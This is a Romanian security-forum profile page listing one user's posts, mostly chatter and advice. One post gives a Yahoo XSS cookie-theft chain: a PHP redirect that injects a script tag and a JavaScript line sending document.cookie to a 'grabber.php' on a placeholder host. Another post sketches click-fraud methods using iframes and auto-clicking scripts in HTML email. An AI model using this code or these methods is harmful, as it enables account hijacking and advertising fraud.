katmai
-
Posts
548 -
Joined
-
Last visited
Posts posted by katmai
-
-
What is your problem
-
pentru totzi cei care pun intrebari CITITZI CU ATENTZIE :
ACEST TOOL ESTE FACUT PENTRU CEI DEJA FAMILIARIZATI CU XSS SI ATACURI XSS IN SPECIAL DE YAHOO. ACEST TOOL NU ESTE UN TOOL DE GENUL CLICK SI AI COOKIEUL VICTIMEI CI ESTE DOAR UN TOOL CARE II VA FACE MUNCA USOARA ATACATORULUI PRIN DECODAREA DE COOKIE SI LINKURI UTILE.
CONCLUZIE : NU STITI CE INSEAMNA XSS SAU SA LANSATI ATACURI XSS ACEST TOOL NU VA ESTE UTIL.
Cred ca ar trebuii pus pe prima pagina asta,sa intelegi o data.Si acuma ma doare in cot daca va suparati pe mine,voi incercati sa furati cookie cuiva fara cunostinte,de programare,javascript,xss, nici macar minime,si dupa aia sa ii arati la unu ca iai furat cookie si ala sa faca plecaciuni in fata ta!!!!Acest om se numeste RATAT : CAUTATI PE GOOGLE DESPRE XSS,despre JavaScript.
V-am facut update la doua carti sub forma de pdf.
Syngress.Cross.Site.Scripting.Attacks.Xss.Exploits.and.Defense.May.2007
DOWNLOAD
XSS Attacks
DOWNLOAD
-
Deci e aceasi metoda, victima trebuie sa dea click pe link?
Daca gandeai mai mult de 5 sec,iti trecea prin cap sa pui prin iframe..
-
Vezi ca unde ii bug-ul de la yahoo,la sfarsit ii un <script src.. si acolo trebuie sa pui locatia unde ii .js al tau.Si vezi ca a scris cu rosu al english section.Daca nu cunoasteti,luati ceva tutoriale de javascript si php.
-
Eh nu mi se pare nimic in plus fata de celalalt,inafara ca arate cateva informatii in plus :roll: .Daca era si ala facut de slick sa prelungeasca valabilitatea unui cookie era ceva in plus si frumos..dar daca nu vreti sa le dati asta e.Anyway felicitari pentru munca.
-
Nu merge,i-am trimis la pretena mea,si nimic :cry: .
-
Acuma merge dar trebuie sa ii trimiti victimei si NyTrOjan.ocx .Nu se poate cumva sa implementezi si ala,sau vre-o solutie sa il pui online si sa il downloadeze cand executa programu.
-
-
Relax postu` oricum o sa fie trashed,pentru ca e postat la categorie gresita,si aim toate posturile la rand si sa vedem,poate INAINTE cand pe rst se permitea WAREZ si altele,dar sau schimbat multe de atunci,din principiu asta sa scos si warez,pentru ca banuiesc ca se doreste creearea unei comunitati de securitate si sa fie un punct de refer pentru mariile companii cu bussines online.Companiile care ofera astfel de servicii de publicitate,investesc milioane de dolari in securitate.Totusi daca vrei incearca la http://textad.traficdublu.ro/ ,dar sunt extrem de neseriosi,ca am avut si eu anunturi de la ei,poti trece si cu hidden ip foarte simplu de ceea ce au facut ei acolodar ai sa vezi ca te pacalesc la clickuri :wink: .Nu am NIMIC cu tine nu mi-o lua in nume de rau te rog frumos.Doar vreau sa iti spun ca sau schimbat multe lucruri aici pe forum,si acuma nu mai merg metodele ce erau inainte.O data am incercat un facke la google adsense facusem in jur de 800$ intr-o zii si mau pus sa dau banii inapoi la clienti si etc,bineinteles ca nu le-am dat nimic dar nici "banii mei" nu i-am primit.Oamenii nu sunt prosti pe bune mai ales google,si la celalalte companii nu as avea incredere,incerca sa gasesti undeva unde iti da linkuri cat de cat statice si faci un site sa fie mult SEO,nu conteaza ce are pe el nuam sa intre lumea,si pui cu iframe linkurile alea statice.Sau poti face un spam si in adresele de mail care permit HTML,sa inserezi niste Javascript,ceva la un onmouseover ,sa faca un <script src la un script care sa faca practic clickul.Cam astea ar fii ceva metode,dar nu ti-as sugera sa le incerci.
Mama cat am scris :shock:
Regards,
-
Prietene asta e forum de SECURITATE .Cat despre faza cu fata la cearceas,ai dreptate si imi cer scuze,dar postul tau tot nu isi are rost.
Si daca imi permiti sa iti spun,daca vrei sa iti rotunjesti veniturile,iati un job calumea,sau cu o idee buna poti face si bani cinstiti.
-
Tu stii ce vrei?sa gasesti niste oameni prosti care sa te lase sa ii pacalesti,si sa te si mai plateasca,really nu e nimeni asa de prost!!Foarte urat.Cred ca ar trebuii inchis topicu si moved la trash.
-
Am dat un vot pentru "Fiecare user sa-si poata face blog pe RST" ,ar fii foarte frumos o idee destul de originala,ce sigur ne va da un punct in plus,fata de celelalte comunitati de securitate etc.
Regards,
-
felicitari pentru munca timpul si efortul psihic depuse ... dar, faptul ca ai facut publice aceste descoperiri si momentul cand le'ai facut le vor face total inutile , ceea ce erau oricum momentan ... in cel mai bun caz se vroiau a fi o piatra de temelie pentru altele mai utile si cu un impact mai mare dar facerea lor publica nu face decat sa le aduca la urechile celor de la yahoo fapt ce va duce la inevitabila intarire a algoritmilor de codare si a securitatii, pe plan lung acest post va face mai mult rau decat bine pentru 'noi'.
a hacker with no common sense is just ... a programer :/, it's not personal ... it's just the truth.
Vorbeste zgarcenia din el .
-
Felicitari mane pentru munca ta si pentru ca ai impartit totul cu noi :wink: :oops: .Multumesc
-
"ca sa poata apoi sa intre si bulangii" .
Vezi ca aici nu esti la coltu' strazi..sa vorbesti asa.Cel putin mie unu nu imi convenea daca eram un utilizator strain sau nou,sa faci tu referinte din astea,capishi?
(nu o lua in numa de rau :wink: )
-
Da ceva nu e corect,eu am verificat pe un ip de a meu,am in total aprox doua sute de doemnii cu tot cu subdomenii si mi-a rezultat 95.
(Fa si tu asta de anunta-ma cand apare un arspuns nou,ca imi trimite mailurile dupa o zii )
-
[quote=
-
Multumim! Asteptam si tutorialu` despre winamp ^'> :oops: .
-
13
Indrumat de un tovarash spre "calea hack-ului"!
Sunt la rascrucea dintre drumuri: stiu bazele hack-ului si webdesign-ului, da` nu stiu care cale sa o urmez
Bazele hack-ului,asta nu am ami auzit-o ,scuza-ma da cat esti de lame ))))))))))))))) uber lol.
Am mai spuso o data cred cati ani am:19.
-
deci mie de mers imi merge....dar as vrea sa stiu cum as putea sa schimb locatia unde ar trb sa mearga(stiu ca este din google_adsense.php)...ca aici sunt niste reguli
Daca referu nu provine din partea siteutau.com are o conditia de al redirectiona..
<?php
if (strstr($_SERVER['HTTP_REFERER'],"siteutau.com")) {
header ("Location: http://add.yahoo.com/fast/change?from=e4731bcafcfe389bca5d5953e0f5c4dc3d4f0c77a103233652a1724231ec2d81c39631dc9139f43f41a5d7825795fc5a453372b61e2a4a7e564ae89cea2400d276518eda63ee2ec0666473bb04b37c17&email=&new_url=http://&new_email=&new_c t=&submit=Submit&class=newChange&pass=2&guide=uedtc&old_url=%3Cscript%20src=http://siteutau.com/css3.js%3E%3C/script%3E");
}else{ //daca nuu ii true cu conditia noastra il redirectioneaza
redirectionarea....
Aici ii bug-ul de la yahoo,plus un src cu loctia unde se afla css3.js,iar ce ii in css3.js trimite la grabberul tau pentru a substrage cookie.
location.replace ("http://siteutau.com/grabber.php?cookie=" + escape(document.cookie));
si greabberu face si scrierea in fisier.
Bineinteles,ca nu vati gandit sa invatati programare :roll: ,sau am rog sa studiati subiectul,pentru ca ii luati pe toti de prosti prin ceea ce faceti voi,mai am vazut si intrebarea aia ce il intreaba pe Nemessis daca nu stie unde trebuie schimbat ))) si e scris cu rosu domne inca.Ma rog in fine... totul ce se face automatizat PRACTIC ii asta: "><script>alert(document.cookie)</script>
CAcapishi acuma? :roll:
-
E foarte folositor
Regulile sunt pentru tine si pentru toti,editeaza-ti postu.Inainte sa treaca neme pe aici sa iti deie un avertisment .
-
Frumoooooooooooooooooooooooos
PS.pune si tu iconitele :twisted: :evil:
-
Welcome si sper sa inveti php :oops: .
-
Eu ti-as recomanda un quad core e 300€ procesoru... plus o placa de baza abit,MINIM 500 gb,4 gb ram :oops: :oops: un pic peste pretu tau chiar dublu dar na
Caut un web designer.
in Programare
Posted
Deci tu vrei si coding?si cum sa isi faca update singur,ca nu are de unde sa isi faca update singur.Eventul un admin panel de unde sa faci tu update si etc.